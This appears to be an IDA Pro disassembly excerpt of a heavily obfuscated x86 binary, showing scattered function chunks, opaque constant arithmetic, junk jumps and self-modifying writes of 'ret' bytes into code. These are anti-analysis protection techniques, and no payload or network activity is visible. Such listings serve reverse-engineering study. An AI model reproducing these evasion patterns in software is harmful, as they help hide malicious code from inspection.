loc_44E830: ; CODE XREF: sub_4398BF+5j
jmp loc_44926E
; END OF FUNCTION CHUNK FOR sub_4398BF
; =============== S U B R O U T I N E =======================================
sub_44E835 proc near ; CODE XREF: sub_44445F+131Aj
; ut7h7i2x:0044914Fp ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00455A6F SIZE 00000013 BYTES
push ebp
jmp loc_455A6F
sub_44E835 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_44E83B: ; CODE XREF: sub_4417AF:loc_447D6Ej
; sub_4417AF+8EB2j
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0F1h
jnz loc_43D259
jmp loc_441078
; END OF FUNCTION CHUNK FOR sub_4417AF
; =============== S U B R O U T I N E =======================================
sub_44E84C proc near ; CODE XREF: sub_447EB5:loc_43CB4Bp
; ut7h7i2x:loc_44BD82j
; FUNCTION CHUNK AT 004439DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045504E SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, offset dword_43AFA8
call sub_43F058
lea eax, [ebp-14h]
jmp loc_4439DB
sub_44E84C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44E862: ; CODE XREF: ut7h7i2x:00455592j
xchg ebx, [esp]
push eax
push 4A38EB41h
pop eax
sub eax, 995F1281h
cmp eax, 0CB30CA3Fh
jmp loc_44D27F
; ---------------------------------------------------------------------------
loc_44E87D: ; CODE XREF: ut7h7i2x:00443DC7j
js loc_44B178
xor ebx, ebp
loc_44E885: ; CODE XREF: ut7h7i2x:loc_443DBCj
or ebx, 28502A33h
jns loc_447B65
loc_44E891: ; CODE XREF: ut7h7i2x:00442787j
jmp sub_4448AF
; ---------------------------------------------------------------------------
jmp loc_451F50
; ---------------------------------------------------------------------------
push 9851A03Fh
jmp loc_4444DD
; =============== S U B R O U T I N E =======================================
sub_44E8A5 proc near ; DATA XREF: sub_44D066+416Bo
; FUNCTION CHUNK AT 0043F870 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044AE45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BB77 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044E6C3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452F6B SIZE 0000000C BYTES
push ebx
push 0BA324D6h
pop ebx
and ebx, 8B14B4C3h
add ebx, 0F541AC8Ah
call sub_459019
loc_44E8BD: ; CODE XREF: sub_4469B9:loc_443E28j
push edi
push 4445987h
pop edi
or edi, 0A6A01BF3h
and edi, 67E6665Fh
test edi, 100000h
jmp loc_452F6B
sub_44E8A5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44E8DB: ; CODE XREF: ut7h7i2x:0044B766j
rol edi, 0Fh
; =============== S U B R O U T I N E =======================================
sub_44E8DE proc near ; CODE XREF: sub_44B8F8-B867p
; FUNCTION CHUNK AT 0044DFD7 SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jmp loc_44DFD7
sub_44E8DE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44E8F3 proc near ; CODE XREF: ut7h7i2x:0044017Dj
; ut7h7i2x:00458763p
xchg eax, [esp+0]
pop eax
setnz byte ptr [ebp-1]
sub_44E8F3 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_44E8FB: ; CODE XREF: sub_455DCD:loc_43A442j
; sub_4455F4-23C5j ...
mov al, [ebp-1]
pop ecx
pop ebp
jmp loc_451573
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445048
loc_44E905: ; CODE XREF: sub_445048-F07j
jz loc_43B36F
loc_44E90B: ; CODE XREF: sub_44081E+807Aj
or ebx, 91C29FEFh
xor esi, 0BC9B20AFh
jmp loc_43B367
; END OF FUNCTION CHUNK FOR sub_445048
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_402. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44E91D: ; CODE XREF: ut7h7i2x:0045612Aj
jmp locret_444771
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_44E922: ; CODE XREF: sub_44B5CF-135j
; ut7h7i2x:loc_459013j
jmp loc_44F990
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
loc_44E927: ; CODE XREF: ut7h7i2x:004492F1j
xchg ebx, [edi]
sub eax, edi
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_44E92B: ; CODE XREF: sub_4524FE:loc_43DE68j
rol edi, 0Bh
add edi, 9B2C34C9h
xchg edi, [esp+0]
jmp loc_458DB6
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44E93C: ; CODE XREF: sub_43CCC3:loc_455E04j
pop eax
xor eax, 0E5156775h
sub eax, 31830F96h
jnz loc_44EBF6
mov [ebp+0], ecx
cmp eax, edi
jmp loc_44EBED
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
add ebp, 0FEEDE8F7h
jmp sub_457818
; ---------------------------------------------------------------------------
xchg edi, [ecx]
jmp sub_449C2C
; ---------------------------------------------------------------------------
loc_44E96B: ; CODE XREF: ut7h7i2x:0043D57Fj
and edi, esi
add esi, 89EAC2BFh
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_44E973: ; CODE XREF: sub_4462B0:loc_43D56Dj
rol eax, 0Ah
; END OF FUNCTION CHUNK FOR sub_4462B0
; START OF FUNCTION CHUNK FOR sub_45410C
loc_44E976: ; CODE XREF: sub_45410C+BD7j
jb loc_455434
jmp loc_44E427
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
test ebx, ebp
jmp loc_44C22C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439170
loc_44E988: ; CODE XREF: sub_439170:loc_45A63Fj
pop ecx
or ecx, 0D21B9213h
sub ecx, 62F40724h
and ecx, 0C3353C13h
or ecx, 35D04112h
jmp loc_44D9BB
; END OF FUNCTION CHUNK FOR sub_439170
; ---------------------------------------------------------------------------
xchg ebp, edi
jmp sub_449553
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_44E9AD: ; CODE XREF: sub_4489DF:loc_4520FAj
jz loc_44703C
jmp loc_43B902
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8EC
loc_44E9B8: ; CODE XREF: sub_45A8EC:loc_44112Dj
xchg esi, [esp+0]
jmp loc_44EF5A
; END OF FUNCTION CHUNK FOR sub_45A8EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4411BF
loc_44E9C0: ; CODE XREF: sub_4411BF+7j
mov edi, ecx
xchg edi, [esp+8+var_8]
push eax
mov eax, ebx
xchg eax, [esp+0Ch+var_C]
jmp loc_43CF91
; END OF FUNCTION CHUNK FOR sub_4411BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_44E9D0: ; CODE XREF: sub_449FD5:loc_450F82j
pop ebp
mov eax, ds:dword_4481E8
or eax, eax
jnz loc_4540F9
jmp loc_43B90B
; END OF FUNCTION CHUNK FOR sub_449FD5
; =============== S U B R O U T I N E =======================================
sub_44E9E4 proc near ; DATA XREF: sub_455239:loc_453AD3o
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00451CA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004520E4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454222 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A557 SIZE 00000005 BYTES
pop edx
mov eax, [esp-4+arg_0]
push edx
push edi
push 380172EDh
jmp loc_45A557
sub_44E9E4 endp
; =============== S U B R O U T I N E =======================================
sub_44E9F4 proc near ; CODE XREF: sub_45854D:loc_43D767p
; ut7h7i2x:004428AAj
; FUNCTION CHUNK AT 0045A827 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
loc_44E9F8: ; CODE XREF: sub_4459EE:loc_45A649j
xchg eax, edx
call sub_44ED9F
jmp loc_45A827
sub_44E9F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457541
loc_44EA03: ; CODE XREF: sub_457541:loc_4553DEj
jz loc_458DAC
jmp loc_44C2D6
; END OF FUNCTION CHUNK FOR sub_457541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_44EA0E: ; CODE XREF: sub_443BC5:loc_4531B2j
lea eax, loc_452FA0
mov byte ptr [eax], 0C3h
jmp loc_447EE7
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_44EA1C: ; CODE XREF: sub_447EB5:loc_452FA0j
pop edx
mov eax, [esp+0]
jmp loc_444070
; END OF FUNCTION CHUNK FOR sub_447EB5
; =============== S U B R O U T I N E =======================================
sub_44EA25 proc near ; DATA XREF: sub_453B87+8o
push 38151F2Eh
pop ecx
and ecx, 0DAF3BF12h
or ecx, 5B9A68h
add ecx, 0D1D713B6h
call sub_43F19A
sub_44EA25 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_44EA42: ; CODE XREF: sub_45A25C-286Dj
jmp loc_44969E
; END OF FUNCTION CHUNK FOR sub_45A25C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_128. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_44EA48: ; CODE XREF: sub_447F0A-E967j
mov [ecx], edi
sbb ebp, 99C3EEFFh
jmp loc_44813D
; END OF FUNCTION CHUNK FOR sub_447F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_44EA55: ; CODE XREF: sub_453E14:loc_458E73j
xor edx, 0D485DD0Ah
jmp loc_43AEF2
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
loc_44EA60: ; CODE XREF: ut7h7i2x:loc_43C919j
push offset sub_44B98B
jmp locret_447298
; =============== S U B R O U T I N E =======================================
sub_44EA6A proc near ; CODE XREF: ut7h7i2x:0043D0F1j
; ut7h7i2x:00449159p
xchg eax, [esp+0]
pop eax
call sub_43AA94
call sub_43F249
sub_44EA6A endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_44EA78: ; CODE XREF: sub_43C0DA:loc_457698j
jz loc_44515E
jmp loc_450503
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44EA83: ; CODE XREF: sub_449E96+4CBj
mov eax, [esp+0]
push edx
call sub_44B5CF
mov eax, 20413B0Fh
push edi
jmp loc_4552E1
; END OF FUNCTION CHUNK FOR sub_449E96
; =============== S U B R O U T I N E =======================================
sub_44EA97 proc near ; DATA XREF: sub_451980+8o
mov edx, [esp+0]
push eax
push offset sub_43C969
jmp nullsub_543
sub_44EA97 endp
; ---------------------------------------------------------------------------
loc_44EAA5: ; CODE XREF: ut7h7i2x:0043A70Aj
adc ebx, edi
cmp edx, 51B2447Eh
jmp loc_4536D4
; ---------------------------------------------------------------------------
loc_44EAB2: ; CODE XREF: ut7h7i2x:0044FFE1j
xor ecx, ebp
cdq
loc_44EAB5: ; CODE XREF: ut7h7i2x:loc_44FFD3j
add ebx, 0D34D0E63h
mov [ebx], eax
pop ebx
jmp loc_44F80B
; ---------------------------------------------------------------------------
loc_44EAC3: ; DATA XREF: sub_44D79C:loc_444931o
lea eax, [ebp-1Ch]
mov dword ptr [eax], offset dword_474244
push edx
push 78FF504Ch
xchg ecx, [esp]
mov edx, ecx
jmp loc_43E7D6
; ---------------------------------------------------------------------------
loc_44EADC: ; DATA XREF: sub_43DA21+14052o
mov eax, [ebp-4]
mov al, [eax]
jno loc_43EB1C
sub al, 99h
jmp loc_4542D8
; ---------------------------------------------------------------------------
loc_44EAEE: ; CODE XREF: ut7h7i2x:loc_457D76j
lea eax, nullsub_21
mov byte ptr [eax], 0C3h
jmp nullsub_21
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_44EAFC: ; CODE XREF: sub_44917B+2CFAj
pop edx
mov eax, [esp-14h+arg_10]
push edx
call sub_45601B
mov eax, 72B18749h
call sub_43AA94
jmp loc_44733E
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_44EB15: ; CODE XREF: sub_4529E0-1CA9j
jle loc_451780
or esi, edx
jmp loc_443F80
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_44EB22: ; CODE XREF: sub_440CEC:loc_43D298j
; sub_454A2B:loc_4451D0j
xchg edi, [esp+0]
call sub_444E04
push 4B3B32C0h
pop eax
sub eax, 57F9EDFBh
test eax, 2000h
; END OF FUNCTION CHUNK FOR sub_440CEC
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_44EB3C: ; CODE XREF: sub_43DD17+C79Fj
jmp loc_43BDE5
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
loc_44EB41: ; CODE XREF: ut7h7i2x:loc_45A491j
adc edx, 610A8BFDh
mov ebp, edi
jmp loc_459D26
; ---------------------------------------------------------------------------
loc_44EB4E: ; CODE XREF: ut7h7i2x:0044B65Ej
call sub_455F83
; START OF FUNCTION CHUNK FOR sub_43CFB6
loc_44EB53: ; CODE XREF: sub_43CFB6+19B5Ej
jmp loc_4437F3
; END OF FUNCTION CHUNK FOR sub_43CFB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_44EB58: ; CODE XREF: sub_45742F:loc_43EED0j
jz loc_43CA5B
jmp loc_44465C
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450E41
loc_44EB63: ; CODE XREF: sub_450E41+1FE1j
jns nullsub_266
loc_44EB69: ; CODE XREF: sub_450E41:loc_43ECECj
or edx, 7B45479Ch
xor edx, 33608EAFh
or edx, 0D161657Ch
xor edx, 593BAAFBh
add edx, ebp
jmp loc_4534A9
; END OF FUNCTION CHUNK FOR sub_450E41
; =============== S U B R O U T I N E =======================================
sub_44EB88 proc near ; CODE XREF: sub_45292B:loc_43B43Dj
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043BF09 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043C25C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E3AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004414B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441622 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004477EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AB8C SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044BAE9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E053 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044EF87 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004500B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004509DE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00456CDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AD9D SIZE 0000001A BYTES
push ebx
mov [ebp-4], eax
mov eax, offset dword_442EB4
call sub_44A4C0
cmp ds:dword_4513A4, 0
jnz loc_45646D
jmp loc_4500B1
sub_44EB88 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44EBA8 proc near ; DATA XREF: sub_445416+12A3Bo
; FUNCTION CHUNK AT 004599E3 SIZE 00000017 BYTES
mov esp, ebp
xchg edi, [esp+0]
mov ebp, edi
pop edi
push 0CC0237E8h
pop eax
jmp loc_4599E3
sub_44EBA8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push eax
loc_44EBBC: ; CODE XREF: ut7h7i2x:00442CBBj
ror eax, 19h
mov ds:dword_44880C, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_44EBC6: ; CODE XREF: sub_4489DF-199Dj
jmp loc_43B181
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445056
loc_44EBCB: ; CODE XREF: ut7h7i2x:00439536j
; sub_445056+2j
rol eax, 19h
push eax
call sub_454196
jmp loc_449FEB
; END OF FUNCTION CHUNK FOR sub_445056
; =============== S U B R O U T I N E =======================================
sub_44EBD9 proc near ; DATA XREF: ut7h7i2x:00442A6Ao
call sub_442D06
call sub_443A21
sub_44EBD9 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_446599
loc_44EBE3: ; CODE XREF: sub_446599+17j
jmp loc_43A089
; END OF FUNCTION CHUNK FOR sub_446599
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_44EBE8: ; CODE XREF: sub_4503C3-16FC8j
jmp loc_43AD35
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44EBED: ; CODE XREF: sub_43CCC3+11C91j
jno loc_44B146
and ecx, ebx
loc_44EBF5: ; CODE XREF: ut7h7i2x:loc_44164Ej
pushf
loc_44EBF6: ; CODE XREF: sub_43CCC3+11C86j
or eax, 1554130Dh
xor eax, 0FAB4DAABh
jmp loc_44AABD
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446151
loc_44EC07: ; CODE XREF: sub_446151:loc_455951j
push offset loc_45365A
jmp loc_447D8C
; END OF FUNCTION CHUNK FOR sub_446151
; =============== S U B R O U T I N E =======================================
sub_44EC11 proc near ; CODE XREF: sub_44EC11-13E47p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043968C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00439BD7 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043AC29 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043ADC0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043B58E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043D3B3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043E354 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E882 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043EDB4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440695 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00440DBD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443C15 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447390 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00447562 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448774 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448EF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A4CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DC84 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044DC99 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044EE86 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044FCD8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004515F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453602 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453E3B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00454AD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456872 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004585C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004597A0 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0045A9CA SIZE 00000009 BYTES
xchg eax, [esp+4+var_4]
pop eax
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 19h
jnz loc_43B58E
jmp loc_4585C6
sub_44EC11 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_150. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_44EC28 proc near ; DATA XREF: sub_452EED:loc_456678o
; FUNCTION CHUNK AT 00440268 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C9D3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00451F1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456F7D SIZE 0000000F BYTES
mov esp, ebp
call sub_45458B
loc_44EC2F: ; CODE XREF: ut7h7i2x:00453C27j
jmp loc_456F7D
sub_44EC28 endp
; ---------------------------------------------------------------------------
loc_44EC34: ; CODE XREF: ut7h7i2x:loc_452CA5j
add ecx, 9FC31CBAh
call sub_449655
; START OF FUNCTION CHUNK FOR sub_45292B
loc_44EC3F: ; CODE XREF: sub_45292B+1A0Bj
jmp loc_444E2A
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
loc_44EC44: ; CODE XREF: ut7h7i2x:0043F299j
jmp nullsub_471
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44EC49: ; CODE XREF: sub_442B3B:loc_43976Dj
push 0F2CE5E9h
pop esi
and esi, 25688142h
add esi, 0FB1CF8B4h
jmp loc_43B35F
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44EC60: ; CODE XREF: sub_439BF8:loc_439408j
cmp dword ptr [ebp-4], 6
jnz loc_44A583
jmp loc_43DA76
; END OF FUNCTION CHUNK FOR sub_439BF8
; =============== S U B R O U T I N E =======================================
sub_44EC6F proc near ; CODE XREF: ut7h7i2x:0043AF20j
; sub_452BE9-13C8Bp
; FUNCTION CHUNK AT 00449BE8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C1F3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00453B5F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00456EDB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458EEF SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push 7B11D37Eh
pop edi
jmp loc_458EEF
sub_44EC6F endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_318. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44EC7F: ; CODE XREF: sub_439BD1+19826j
and eax, esi
pushf
push 0DCE2374Bh
pop ebx
jmp loc_4508FC
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_44EC8D: ; CODE XREF: sub_43BE93+80FEj
shl ebp, 4
mov esi, 0AE7E42BBh
shl ecx, 3
jmp loc_44934A
; END OF FUNCTION CHUNK FOR sub_43BE93
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_44EC9D: ; CODE XREF: sub_44B01F:loc_43AE08j
push 0D01FF93Eh
pop ecx
xor ecx, 306F055Ch
sub ecx, 2EEC7834h
xor ecx, 0C9D09A5Eh
jns loc_457966
loc_44ECBB: ; CODE XREF: ut7h7i2x:0044FCFEj
jmp loc_447CAA
; END OF FUNCTION CHUNK FOR sub_44B01F
; ---------------------------------------------------------------------------
ror ebp, 5
jmp loc_457960
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_346. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456ADD
loc_44ECC9: ; CODE XREF: sub_456ADD+5j
jmp nullsub_269
; END OF FUNCTION CHUNK FOR sub_456ADD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_44ECCE: ; CODE XREF: sub_459DE7-17F9j
mov ecx, edx
or edx, 68DB33EBh
jo loc_45A315
and ebp, eax
jmp loc_441F69
; END OF FUNCTION CHUNK FOR sub_459DE7
; ---------------------------------------------------------------------------
; aLesbE0twhU(short)
aLesbE0twhU__s db '‹EèÀe!0TWh²ÎU._éÂ',8,0 ; DATA XREF: sub_443BC5:loc_4534B2o
align 4
loc_44ECF8: ; CODE XREF: ut7h7i2x:0044FA40j
jle loc_459891
push 8C7AE1AFh
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_44ED03: ; CODE XREF: sub_44B72F:loc_4528CAj
; sub_43D021+18702j
xor eax, 0BE5377Eh
call sub_4448AF
jmp loc_4598CF
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
jmp loc_452FD2
; ---------------------------------------------------------------------------
js loc_451955
and ebx, 0BE3F8980h
jmp sub_455127
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44ED29: ; CODE XREF: sub_439BD1+7A88j
sbb edx, ebp
loc_44ED2B: ; CODE XREF: ut7h7i2x:loc_45706Fj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_457941
jmp loc_44E7BA
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_44ED3C: ; CODE XREF: ut7h7i2x:00457676j
xor ebx, 0C0F55DC4h
add ebx, ebp
call sub_448D37
loc_44ED49: ; CODE XREF: ut7h7i2x:0043D28Cj
jmp loc_441CC3
; ---------------------------------------------------------------------------
loc_44ED4E: ; CODE XREF: ut7h7i2x:0044F522j
cdq
; START OF FUNCTION CHUNK FOR sub_44682E
loc_44ED4F: ; CODE XREF: sub_44682E-8B95j
add eax, 0FED6566Bh
call sub_43AED9
mov ds:off_41D010, eax
jmp loc_449949
; END OF FUNCTION CHUNK FOR sub_44682E
; ---------------------------------------------------------------------------
cmp esi, eax
jmp loc_440A3C
; ---------------------------------------------------------------------------
loc_44ED6C: ; DATA XREF: sub_43A556+5E8Ao
push 7D59261Bh
pop eax
sub eax, 0F158149Fh
add eax, 3B2F5C64h
call sub_4501C1
loc_44ED83: ; CODE XREF: ut7h7i2x:00449C9Fj
jmp loc_4497CD
; ---------------------------------------------------------------------------
loc_44ED88: ; CODE XREF: ut7h7i2x:0043EF43j
jz loc_453904
jmp loc_4470CA
; ---------------------------------------------------------------------------
loc_44ED93: ; CODE XREF: ut7h7i2x:0045ACE5j
jle loc_43D748
; =============== S U B R O U T I N E =======================================
sub_44ED99 proc near ; CODE XREF: ut7h7i2x:0043AC24p
xchg esi, [esp+0]
pop esi
pop ebx
retn
sub_44ED99 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44ED9F proc near ; CODE XREF: ut7h7i2x:00439A6Ep
; ut7h7i2x:0043A117p ...
; FUNCTION CHUNK AT 004414B9 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jnb sub_445B07
jmp loc_4414B9
sub_44ED9F endp
; ---------------------------------------------------------------------------
loc_44EDAD: ; CODE XREF: ut7h7i2x:00447311j
pop ebx
; START OF FUNCTION CHUNK FOR sub_454466
loc_44EDAE: ; CODE XREF: sub_454466:loc_4472F2j
xor esi, 0CC340B65h
add esi, 8CA8986Eh
xchg esi, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_454466
; ---------------------------------------------------------------------------
loc_44EDC2: ; CODE XREF: ut7h7i2x:0045020Bj
and edx, ebp
ja loc_44603C
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44EDCA: ; CODE XREF: sub_447CBE:loc_4501F3j
sub ebx, 5FC5CC9Ah
cmp ebx, 0A6D07D60h
jmp loc_44564A
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_44EDDB: ; CODE XREF: sub_443A45+779Dj
jge loc_440A7E
and edx, 0D4E0B2C8h
sbb ecx, edx
jmp loc_440A78
; END OF FUNCTION CHUNK FOR sub_443A45
; ---------------------------------------------------------------------------
loc_44EDEE: ; DATA XREF: sub_442B3B-315Do
mov eax, [eax-8]
or eax, 8
or eax, 10h
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_43AF3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44EE02: ; CODE XREF: sub_442B3B:loc_43F9D5j
cmp dword ptr [ebp-10h], 2
jnz loc_43AF3B
mov eax, [ebp+8]
jmp loc_4574A7
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_44EE14: ; CODE XREF: sub_439D5C:loc_44F33Cj
call sub_440AE3
loc_44EE19: ; CODE XREF: ut7h7i2x:00449A68j
jmp loc_43B955
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_44EE1E: ; CODE XREF: sub_43CA2D+B600j
jmp loc_44B56B
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
